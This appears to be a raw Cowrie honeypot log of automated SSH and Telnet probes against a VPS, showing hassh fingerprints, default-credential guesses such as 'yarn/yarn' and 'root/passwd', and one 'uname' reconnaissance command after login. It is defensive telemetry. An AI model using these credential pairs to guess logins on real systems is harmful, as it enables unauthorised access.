{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:20:12.502986Z","src_ip":"212.227.235.229","session":"61ed9404949b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58252,"dst_ip":"1.2.3.4","dst_port":23,"session":"ffd6eaf0bae8","protocol":"telnet","message":"New connection: 212.227.125.160:58252 (1.2.3.4:23) [session: ffd6eaf0bae8]","sensor":"my-vps","timestamp":"2025-08-28T07:20:12.622926Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:20:12.757708Z","src_ip":"212.227.235.229","session":"61ed9404949b"}
{"eventid":"cowrie.login.failed","username":"awsgui","password":"awsgui","message":"login attempt [awsgui/awsgui] failed","sensor":"my-vps","timestamp":"2025-08-28T07:20:13.524054Z","src_ip":"212.227.235.229","session":"61ed9404949b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56078,"dst_ip":"1.2.3.4","dst_port":23,"session":"4e93d9865da4","protocol":"telnet","message":"New connection: 212.227.125.160:56078 (1.2.3.4:23) [session: 4e93d9865da4]","sensor":"my-vps","timestamp":"2025-08-28T07:20:14.191091Z"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:20:14.780890Z","src_ip":"212.227.235.229","session":"61ed9404949b"}
{"eventid":"cowrie.session.closed","duration":13.012011528015137,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:20:17.436013Z","src_ip":"212.227.125.160","session":"39bf8b6a2622"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58393,"dst_ip":"1.2.3.4","dst_port":23,"session":"da7abb4bca0b","protocol":"telnet","message":"New connection: 212.227.125.160:58393 (1.2.3.4:23) [session: da7abb4bca0b]","sensor":"my-vps","timestamp":"2025-08-28T07:20:17.628781Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60878,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f91512f278b","protocol":"ssh","message":"New connection: 212.227.125.160:60878 (1.2.3.4:22) [session: 9f91512f278b]","sensor":"my-vps","timestamp":"2025-08-28T07:20:22.285649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:20:22.286495Z","src_ip":"212.227.125.160","session":"9f91512f278b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:20:22.506057Z","src_ip":"212.227.125.160","session":"9f91512f278b"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler","message":"login attempt [dolphinscheduler/dolphinscheduler] failed","sensor":"my-vps","timestamp":"2025-08-28T07:20:23.181447Z","src_ip":"212.227.125.160","session":"9f91512f278b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:20:24.402893Z","src_ip":"212.227.125.160","session":"9f91512f278b"}
{"eventid":"cowrie.session.closed","duration":12.632549285888672,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:20:25.255407Z","src_ip":"212.227.125.160","session":"ffd6eaf0bae8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58490,"dst_ip":"1.2.3.4","dst_port":23,"session":"84a79632c40a","protocol":"telnet","message":"New connection: 212.227.125.160:58490 (1.2.3.4:23) [session: 84a79632c40a]","sensor":"my-vps","timestamp":"2025-08-28T07:20:25.517329Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60550,"dst_ip":"1.2.3.4","dst_port":22,"session":"68e1cad97611","protocol":"ssh","message":"New connection: 212.227.235.229:60550 (1.2.3.4:22) [session: 68e1cad97611]","sensor":"my-vps","timestamp":"2025-08-28T07:20:28.937969Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:20:28.938884Z","src_ip":"212.227.235.229","session":"68e1cad97611"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:20:29.191348Z","src_ip":"212.227.235.229","session":"68e1cad97611"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler","message":"login attempt [dolphinscheduler/dolphinscheduler] failed","sensor":"my-vps","timestamp":"2025-08-28T07:20:29.950543Z","src_ip":"212.227.235.229","session":"68e1cad97611"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":39068,"dst_ip":"1.2.3.4","dst_port":23,"session":"f425cd9d139c","protocol":"telnet","message":"New connection: 8.222.212.69:39068 (1.2.3.4:23) [session: f425cd9d139c]","sensor":"my-vps","timestamp":"2025-08-28T07:20:30.093441Z"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:20:31.205485Z","src_ip":"212.227.235.229","session":"68e1cad97611"}
{"eventid":"cowrie.session.closed","duration":13.709535121917725,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:20:31.338243Z","src_ip":"212.227.125.160","session":"da7abb4bca0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58602,"dst_ip":"1.2.3.4","dst_port":23,"session":"fbd2d58482aa","protocol":"telnet","message":"New connection: 212.227.125.160:58602 (1.2.3.4:23) [session: fbd2d58482aa]","sensor":"my-vps","timestamp":"2025-08-28T07:20:31.612438Z"}
{"eventid":"cowrie.session.closed","duration":12.9701087474823,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:20:38.487361Z","src_ip":"212.227.125.160","session":"84a79632c40a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58748,"dst_ip":"1.2.3.4","dst_port":23,"session":"8ff18ef7922d","protocol":"telnet","message":"New connection: 212.227.125.160:58748 (1.2.3.4:23) [session: 8ff18ef7922d]","sensor":"my-vps","timestamp":"2025-08-28T07:20:38.623298Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51030,"dst_ip":"1.2.3.4","dst_port":22,"session":"354db67133fb","protocol":"ssh","message":"New connection: 212.227.125.160:51030 (1.2.3.4:22) [session: 354db67133fb]","sensor":"my-vps","timestamp":"2025-08-28T07:20:38.639923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:20:38.641216Z","src_ip":"212.227.125.160","session":"354db67133fb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:20:38.869966Z","src_ip":"212.227.125.160","session":"354db67133fb"}
{"eventid":"cowrie.login.success","username":"root","password":"passwd","message":"login attempt [root/passwd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:20:39.567633Z","src_ip":"212.227.125.160","session":"354db67133fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63696,"dst_ip":"1.2.3.4","dst_port":23,"session":"cf229c4313fd","protocol":"telnet","message":"New connection: 212.227.235.229:63696 (1.2.3.4:23) [session: cf229c4313fd]","sensor":"my-vps","timestamp":"2025-08-28T07:20:39.611409Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:20:40.103894Z","src_ip":"212.227.125.160","session":"354db67133fb"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:20:40.104601Z","src_ip":"212.227.125.160","session":"354db67133fb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:20:40.334551Z","src_ip":"212.227.125.160","session":"354db67133fb"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:20:40.335682Z","src_ip":"212.227.125.160","session":"354db67133fb"}
{"eventid":"cowrie.session.closed","duration":12.735387802124023,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:20:44.347757Z","src_ip":"212.227.125.160","session":"fbd2d58482aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58810,"dst_ip":"1.2.3.4","dst_port":23,"session":"4259166ddefd","protocol":"telnet","message":"New connection: 212.227.125.160:58810 (1.2.3.4:23) [session: 4259166ddefd]","sensor":"my-vps","timestamp":"2025-08-28T07:20:44.521891Z"}
{"eventid":"cowrie.session.closed","duration":30.441851139068604,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:20:44.632874Z","src_ip":"212.227.125.160","session":"4e93d9865da4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46946,"dst_ip":"1.2.3.4","dst_port":22,"session":"3873b237e773","protocol":"ssh","message":"New connection: 212.227.235.229:46946 (1.2.3.4:22) [session: 3873b237e773]","sensor":"my-vps","timestamp":"2025-08-28T07:20:45.249176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:20:45.250294Z","src_ip":"212.227.235.229","session":"3873b237e773"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:20:45.494165Z","src_ip":"212.227.235.229","session":"3873b237e773"}
{"eventid":"cowrie.login.success","username":"root","password":"passwd","message":"login attempt [root/passwd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:20:46.227786Z","src_ip":"212.227.235.229","session":"3873b237e773"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:20:46.735563Z","src_ip":"212.227.235.229","session":"3873b237e773"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:20:46.736289Z","src_ip":"212.227.235.229","session":"3873b237e773"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:20:46.981936Z","src_ip":"212.227.235.229","session":"3873b237e773"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:20:46.983056Z","src_ip":"212.227.235.229","session":"3873b237e773"}
{"eventid":"cowrie.session.closed","duration":9.846082210540771,"message":"Connection lost after 9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:20:49.457435Z","src_ip":"212.227.235.229","session":"cf229c4313fd"}
{"eventid":"cowrie.session.closed","duration":13.86512279510498,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:20:52.488352Z","src_ip":"212.227.125.160","session":"8ff18ef7922d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58985,"dst_ip":"1.2.3.4","dst_port":23,"session":"414645b3e0cc","protocol":"telnet","message":"New connection: 212.227.125.160:58985 (1.2.3.4:23) [session: 414645b3e0cc]","sensor":"my-vps","timestamp":"2025-08-28T07:20:52.680714Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46216,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d72b6f32f4a","protocol":"ssh","message":"New connection: 212.227.125.160:46216 (1.2.3.4:22) [session: 8d72b6f32f4a]","sensor":"my-vps","timestamp":"2025-08-28T07:20:55.016657Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:20:55.022571Z","src_ip":"212.227.125.160","session":"8d72b6f32f4a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:20:55.243376Z","src_ip":"212.227.125.160","session":"8d72b6f32f4a"}
{"eventid":"cowrie.login.failed","username":"yarn","password":"yarn","message":"login attempt [yarn/yarn] failed","sensor":"my-vps","timestamp":"2025-08-28T07:20:56.132441Z","src_ip":"212.227.125.160","session":"8d72b6f32f4a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:20:57.354412Z","src_ip":"212.227.125.160","session":"8d72b6f32f4a"}
{"eventid":"cowrie.session.closed","duration":12.977015733718872,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:20:57.498817Z","src_ip":"212.227.125.160","session":"4259166ddefd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59033,"dst_ip":"1.2.3.4","dst_port":23,"session":"7198a68e09d5","protocol":"telnet","message":"New connection: 212.227.125.160:59033 (1.2.3.4:23) [session: 7198a68e09d5]","sensor":"my-vps","timestamp":"2025-08-28T07:20:57.731886Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39962,"dst_ip":"1.2.3.4","dst_port":22,"session":"c005b6c4e1d6","protocol":"ssh","message":"New connection: 212.227.235.229:39962 (1.2.3.4:22) [session: c005b6c4e1d6]","sensor":"my-vps","timestamp":"2025-08-28T07:21:01.685605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:21:01.686795Z","src_ip":"212.227.235.229","session":"c005b6c4e1d6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:21:01.940058Z","src_ip":"212.227.235.229","session":"c005b6c4e1d6"}
{"eventid":"cowrie.session.closed","duration":31.921519994735718,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:21:02.014886Z","src_ip":"8.222.212.69","session":"f425cd9d139c"}
{"eventid":"cowrie.login.failed","username":"yarn","password":"yarn","message":"login attempt [yarn/yarn] failed","sensor":"my-vps","timestamp":"2025-08-28T07:21:02.702424Z","src_ip":"212.227.235.229","session":"c005b6c4e1d6"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:21:03.958173Z","src_ip":"212.227.235.229","session":"c005b6c4e1d6"}
{"eventid":"cowrie.session.closed","duration":13.723605155944824,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:21:06.404220Z","src_ip":"212.227.125.160","session":"414645b3e0cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59194,"dst_ip":"1.2.3.4","dst_port":23,"session":"616e373be916","protocol":"telnet","message":"New connection: 212.227.125.160:59194 (1.2.3.4:23) [session: 616e373be916]","sensor":"my-vps","timestamp":"2025-08-28T07:21:06.643656Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50060,"dst_ip":"1.2.3.4","dst_port":22,"session":"21e6768e383e","protocol":"ssh","message":"New connection: 212.227.125.160:50060 (1.2.3.4:22) [session: 21e6768e383e]","sensor":"my-vps","timestamp":"2025-08-28T07:21:11.610260Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:21:11.611075Z","src_ip":"212.227.125.160","session":"21e6768e383e"}
{"eventid":"cowrie.session.closed","duration":13.94120979309082,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:21:11.673020Z","src_ip":"212.227.125.160","session":"7198a68e09d5"}
